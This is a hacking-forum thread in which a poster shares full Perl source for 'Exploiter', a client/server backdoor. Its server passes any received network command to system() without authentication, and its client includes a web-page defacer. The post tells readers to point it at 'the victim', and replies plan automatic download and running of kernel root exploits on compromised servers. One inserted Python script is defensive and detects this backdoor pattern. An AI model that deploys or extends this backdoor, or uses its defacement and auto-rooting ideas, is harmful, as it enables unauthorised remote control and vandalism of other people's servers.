Exploiter Project
  • Sh3llc0d3
    Posts: 1,910
    I'm sick and tired of seeing the same old shite in Perl forums elsewhere, no malware at all. I've seen SO many versions of the back-connect made by IHS for rooting a server... so I thought, why only a back-connect... why not make something capable of running programs, installing, etc.? For this I started with a VERY simple client/server using Perl socket programming and then built on the use of the system() command to execute bash commands on Linux machines, such as wget. I'll say this: it is at the moment still very simple. But then again I've only been learning Perl for a very short amount of time. Picking up something and then expanding it and applying theories to other areas is what hacking is about... use your imagination :) I've tried this out on my own machine locally, downloading files from my VPS setup online. It downloads the files perfectly.

    Update: 13/1/2011
    - Basic defacer
    - Command entry/sends to server
    Needs fixing:
    - chdir seems not to work, I'll see what I can do and get back to you.
    - Defacer will check what index extension is in use instead of assuming .html at the moment.

    Exploiter 0.2 - Untested
    Screenshot: http://i51.tinypic.com/2psqgt3.png


    Instructions:
    chmod +x file.pl
    ./file.pl -n [NAME]

    Client:
    #!/usr/bin/perl
    # Exploiter 0.2
    # Coded by Semtex-Primed
    # www.iExploit.org
    use IO::Socket;
    use Getopt::Std;

    getopts("n:", \%args);
    if (defined $args{n}) {
        $n1 = $args{n};
    }
    if (!defined $args{n}) {
        print "Usage: $0 -n [NAME]\n";
        exit;
    }

    @exploiter = (
        "\n\t8888888888 888 d8b 888 \n",
        "\t888 888 Y8P 888 \n",
        "\t888 888 888 \n",
        "\t8888888 888 888 88888b. 888 .d88b. 888 888888 .d88b. 888d888 \n",
        "\t888 Y8bd8P 888 88b 888 d88 88b 888 888 d8P Y8b 888P \n",
        "\t888 X88K 888 888 888 888 888 888 888 88888888 888 \n",
        "\t888 .d8pq8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. 888 \n",
        "\t8888888888 888 888 88888P 888 Y88P 888 Y888 Y8888 888 \n",
        "\t 888 \n",
        "\t 888 .::Semtex-Primed::. \n",
        "\t 888 www.iExploit.org \n"
    );
    @options = (
        "\n\t\t\t Welcome to Exploiter $n1!\n",
        "\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n",
        "\t\t\t|+| 1. Connect to server |+|\n",
        "\t\t\t|+| 2. Close |+|\n",
        "\t\t\t|+| 3. Features |+|\n",
        "\t\t\t|+| 4. Credits/Shouts |+|\n",
        "\t\t\t|+| |+|\n",
        "\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n"
    );
    while(1) {
        system("clear");
        print @exploiter;
        print @options;
        print "\t\t\tWhat is your option? \n";
        print "\t\t\t>> ";
        $choice = <STDIN>;
        chomp ($choice);
        if($choice eq "1") {
            my $sock = new IO::Socket::INET (
                PeerAddr => 'HackStation',
                PeerPort => '8880',
                Proto => 'tcp',
            );
            die "\t\t\tCould not create socket: $!\n" unless $sock;
            print $sock "\t\t\tConnected!!\n"; #Used to confirm connection in testing
            while ($sock) {
                print "\t\t\tConnected, here's your choices\n";
                print "\t\t\t1. Enter command\n";
                print "\t\t\t2. Auto-Defacer (webserver's only!)\n";
                print "\t\t\t3. quit\n";
                print "\t\t\t>> ";
                $choice = <STDIN>;
                chomp ($choice);
                if ($choice eq "3") {
                    close($sock);
                    exit($sock);
                    last;
                } elsif ($choice eq "1") {
                    print "\t\t\tEnter Command: \n";
                    print "\t\t\t>> ";
                    $data2send = <STDIN>;
                    chomp ($data2send);
                    $sock->send("$data2send");
                    print <$sock>;
                    #close $sock;
                    last;
                } elsif ($choice eq "2") {
                    $chdir = 'chdir /var/www/';
                    chomp ($chdir);
                    $sock->send("$chdir");
                    print "\t\t\t[-] You are now working in... \n";
                    print "\t\t\t[-] /var/www/ default web root!\n";
                    $remove_index = "rm index.html";
                    chomp ($remove_index);
                    $sock->send("$remove_url");
                    print "\t\t\t[-] index.html has been removed\n";
                    print "\t\t\t[-] now upload your own!\n";
                    print "\t\t\tWget deface from URL: \n";
                    print "\t\t\t>> ";
                    $deface_url = <STDIN>;
                    chomp ($deface_url);
                    $sock->send("$deface_url");
                }
            }
        } elsif($choice eq "2") {
            exit
        } elsif($choice eq "3") {
            #features
            @features = (
                "\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n",
                "\t\t\t|+| |+|\n",
                "\t\t\t|+| |+|\n",
                "\t\t\t|+| |+|\n"
            );
            print @features;
            sleep(5);
        } elsif($choice eq "4") {
            #credz
            @credits = (
                "\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n",
                "\t\t\t|+| Big shout out to: |+|\n",
                "\t\t\t|+| ~ iExploit.org ~ |+|\n",
                "\t\t\t|+| and all of it members |+|\n",
                "\t\t\t|+| |+|\n",
                "\t\t\t|+|-------------------------|+|\n"
            );
            print @credits;
            sleep(5);
        }
    }


    Server:
    #!/usr/bin/perl
    use IO::Socket;
    #use IO::CaptureOutput qw/capture/;
    use Capture::Tiny qw/capture/;

    while(1) {
        my $sock = new IO::Socket::INET (
            LocalHost => 'HackStation',
            LocalPort => '8880',
            Proto => 'tcp',
            Listen => 1,
            Reuse => 1,
        );
        die "\t\tCould not create socket: $!\n" unless $sock;

        my $new_sock = $sock->accept();
        while (<$new_sock>) {
            print $_;
            $new_sock->recv($recv_data,1024);
            if($recv_data eq 'q' or $recv_data eq 'Q') {
                close $new_sock;
            } else {
                ($stdout, $stderr) = capture {
                    system("$recv_data");
                };
                print $new_sock ($stdout, $stderr);
                last;
            }
        }
        # close($sock);
    }


    Exploiter 0.1
    Server:
    #!/usr/bin/perl
    use IO::Socket;

    while(1) {
        my $sock = new IO::Socket::INET (
            LocalHost => 'netbook1-linux',
            LocalPort => '8880',
            Proto => 'tcp',
            Listen => 1,
            Reuse => 1,
        );
        die "\t\tCould not create socket: $!\n" unless $sock;

        my $new_sock = $sock->accept();
        while (<$new_sock>) {
            print $_;
            $new_sock->recv($recv_data,1024);
            if($recv_data eq 'q' or $recv_data eq 'Q') {
                close $new_sock;
            } else {
                system("$recv_data");
                last;
            }
        }
        # close($sock);
    }


    Exploiter:
    #!/usr/bin/perl
    use IO::Socket;
    @header = (
        "\n\n\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n",
        "\t\t|+| Exploiter 0.1 |+|\n",
        "\t\t|+| ~ Semtex-Primed ~ |+|\n"
    );
    @options = (
        "\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n",
        "\t\t|+| 1. Connect to server |+|\n",
        "\t\t|+| 2. Close |+|\n",
        "\t\t|+| |+|\n",
        "\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n"
    );
    while(1) {
        system("clear");
        print @header;
        print @options;
        print "\t\tWhat is your option? \n";
        print "\t\t>>> ";
        $choice = <STDIN>;
        chomp ($choice);
        if($choice eq "1") {
            my $sock = new IO::Socket::INET (
                PeerAddr => 'netbook1-linux',
                PeerPort => '8880',
                Proto => 'tcp',
            );
            die "\t\tCould not create socket: $!\n" unless $sock;
            print $sock "\t\tConnected!!\n";
            while ($sock) {
                print "\t\tConnected, here's your choices\n";
                print "\t\t1. Enter command\n";
                print "\t\t2. quit\n";
                print "\t\t>> ";
                $choice = <STDIN>;
                chomp ($choice);
                if ($choice eq "2") {
                    close($sock);
                    exit($sock);
                    last
                } elsif ($choice eq "1") {
                    print "\t\tEnter Command! \n";
                    print "\t\t>> ";
                    $data2send = <STDIN>;
                    chomp ($data2send);
                    $sock->send($data2send);
                    close $sock;
                    last;
                }
            }
        } elsif($choice eq "2") {
            exit
        }
    }


    This is a LOCAL project. This means that the program will work only within your network. Where I have put "netbook1-linux", change it to the hostname of the victim. I will eventually allow it to accept an IP address you enter.

    USAGE:
    When the server is running, run the exploiter and then select "connect to server", then "enter command". For the next bit you need to know some bash. To do a simple test enter the following: "wget google.co.uk/index.html". This will download a copy of the Google homepage into the folder which you started the server in. To close the exploiter just press the correct number; the server will still be running, allowing you to reconnect.

    Enjoy,
    S-P
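    The server posted above hands whatever bytes arrive on the socket straight to system() with no authentication, so any host that can reach the port gets command execution. As an added example that is not part of the thread, here is a small Python triage script a defender can run over Perl files found on a host to flag that pattern (an IO::Socket::INET listener whose recv()'d variable flows into system/exec/backticks); the regexes and both sample scripts are my own constructions.

```python
import re
# Indicators drawn from the thread's server code: an IO::Socket::INET listener
# and a recv()'d variable passed straight to system(). Regexes are my own.
LISTENER_RE = re.compile(r"IO::Socket::INET\b.*?\bListen\s*=>", re.S)
RECV_RE = re.compile(r"\$\w+\s*->\s*recv\s*\(\s*\$(\w+)\s*,")

def tainted_exec_vars(src, tainted):
    """Return the tainted names that reach system()/exec() or backticks."""
    hits = []
    for var in sorted(tainted):
        v = re.escape(var)
        # system("$var") / system($var) / exec(...)   or   `... $var ...`
        sink = re.compile(r"\b(?:system|exec)\s*\(\s*\"?\$" + v + r"\b|`[^`]*\$" + v + r"\b")
        if sink.search(src):
            hits.append(var)
    return hits

def scan_perl_source(src):
    """Classify one Perl source text: does network input reach a command sink?"""
    tainted = set(RECV_RE.findall(src))
    listener = bool(LISTENER_RE.search(src))
    sinks = tainted_exec_vars(src, tainted)
    if listener and sinks:
        risk = "high"    # unauthenticated remote command execution pattern
    elif listener or tainted:
        risk = "medium"  # network input handled, not seen reaching a sink
    else:
        risk = "low"
    return {"listener": listener, "tainted": sorted(tainted), "sinks": sinks, "risk": risk}

# Constructed sample modelled on the thread's 0.1 server (trimmed, not verbatim).
SUSPECT = r'''
use IO::Socket;
my $sock = new IO::Socket::INET(LocalPort => '8880', Proto => 'tcp', Listen => 1, Reuse => 1);
my $new_sock = $sock->accept();
$new_sock->recv($recv_data,1024);
system("$recv_data");
'''
# Constructed benign listener: it only echoes what it receives.
BENIGN = r'''
use IO::Socket;
my $sock = new IO::Socket::INET(LocalPort => '8880', Proto => 'tcp', Listen => 1);
my $c = $sock->accept();
$c->recv($line, 1024);
print $c "you said: $line\n";
'''

if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, scan_perl_source(src))
```

    The static check is a triage aid only: it cannot see obfuscated sinks, so a "high" hit should be confirmed by looking at what is actually bound on the port.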
  • sangf
    Posts: 203
    haha that's pretty cool, would be neat to receive the output of system() back at the client :)
  • Sh3llc0d3
    Posts: 1,910
    sangf said:
        haha that's pretty cool, would be neat to receive the output of system() back at the client :)

    Haha, I was working on that next! The problem is at the moment it's a case of doing it all from memory chdir wget chmod's etc... so it would be a lot better with the returned output as you said. I've not finished it but I'll update when I've got the output cracked :)
  • Xin
    Posts: 3,251
    I think a good feature for it to have is run the command
    whoami

    On the server and return the result to the client before you execute any commands
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Xin said:
        I think a good feature for it to have is run the command
        whoami
        On the server and return the result to the client before you execute any commands

    Thanks for the suggestion the next upgrades will be (hopefully):
    - run "uname -a" at connection. Same for "whoami" thanks to Xin.
    - Send output of the cmds back to client.
    - Allow for the selection of local root exploits from a server and download/execute.
  • Xin
    Posts: 3,251
    Yeah it would be nice to, like, autoroot: find the version, search exploit-db, then execute. Only problem is that we would need to be able to identify what the filetype is so we know how to compile.
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Yeah that's what I'm thinking, it finds the kernel version then downloads the relevant exploit. The problem is the victim has to have perl. We'll see, it should work out quite well though.
  • Xin
    Posts: 3,251
    Most servers do tend to have gcc, perl and python installed, at least most of the ones I've rooted have.
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Yeah that's what this relies on, most of the servers I've 'experienced' have at least gcc and perl on them, perl for Linux admin scripts.
  • I might start a python port of this. This would make an interesting project.
  • Xin
    Posts: 3,251
    said:
        I might start a python port of this. This would make an interesting project.

    Already starting something similar-ish, check out my question
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Good luck guys, I'm just working my balls off trying to find a solution to returning the output.
  • Xin
    Posts: 3,251
    Sh3llc0d3 said:
        Good luck guys, I'm just working my balls off trying to find a solution to returning the output.

    That's exactly what I'm stuck on! I can get it to execute fine, but it won't send the output :(
    Xin
  • Xin said:
        Sh3llc0d3 said:
            Good luck guys, I'm just working my balls off trying to find a solution to returning the output.
        That's exactly what I'm stuck on! I can get it to execute fine, but it won't send the output :(

    What won't send the output. Server or client?
  • Sh3llc0d3
    Posts: 1,910
    Xin said:
        Sh3llc0d3 said:
            Good luck guys, I'm just working my balls off trying to find a solution to returning the output.
        That's exactly what I'm stuck on! I can get it to execute fine, but it won't send the output :(

    FUCK YESSSS!!! 3 hours later and I've found a module that will help me. It's outputting but the formatting is completely screwed with "wget", however when I do "ls -l" the formatting is fine. I'm happy though, at least it confirms the command has been completed.

    <<Big Pictures Alert!!>>
    Screenshot ('ls -l'): http://i54.tinypic.com/2rxfp07.png
    Screenshot ('wget'): http://i54.tinypic.com/i7056e.png
    Yes, I was watching Harry Potter lol. I just couldn't be bothered cropping the screenshots.

    You guys have no idea how happy I am right now, this piece of code has been the bane of my life for the past week! Now with a few mods it should be good to go for more thorough testing ;) I'll also be posting the new source after I've made the mods. More features to add and thanks for suggestions! I'm looking at an auto-defacer and a few other ideas.

    said:
        What won't send the output. Server or client?

    Well I don't know about Xin but my problem was that the output from commands such as ls -l and wget was showing up server side but I couldn't get it to return via the socket to the client... but it's now fixed.
  • sangf
    Posts: 203
    nice one~ output looks good to me, but I never used wget before. *snipped many lines of me being stupid trying to justify sending something back before system() is called.. I just realized there is no difference between that and the local echo besides the guarantee of command execution.. but you need to type the command locally anyway, so 2 echoes would just be ugly. xD*
  • Sh3llc0d3
    Posts: 1,910
    Well I've completed the code for the auto-defacer too... it's not truly automated, user input is still needed but I'm sure no one will moan about typing one line. The code is a bit scruffy so tomorrow I'm going to work on presentation and comments, then come up with some more features. If anyone has any suggestions for features do post and I'll see what I can do. Bearing in mind I'm still a beginner, so don't ask for things likely to be hard to code :P
  • Sh3llc0d3 said:
        If anyone has any suggestions for features do post and I'll see what I can do. Bearing in mind I'm still a beginner, so don't ask for things likely to be hard to code :P

    How about a GUI lol. I was thinking of adding a GUI for pyBackdoor once Xinapse and I are finished with it.
  • Sh3llc0d3
    Posts: 1,910
    I actually was thinking of messing about with a GUI, I've used glade with perl a bit in the past so I'll sort the code out tomorrow and have a play about with that. I prefer command line but we'll see :P
  • Sh3llc0d3 said:
        I actually was thinking of messing about with a GUI, I've used glade with perl a bit in the past so I'll sort the code out tomorrow and have a play about with that. I prefer command line but we'll see :P

    Yea but it'd be nice to have a neat lookin GUI. Might make things easier.
  • Xin
    Posts: 3,251
    GUI would be pretty nice, yeah we have the same problem with getting the output of system commands, there must be another library that can do it
    Xin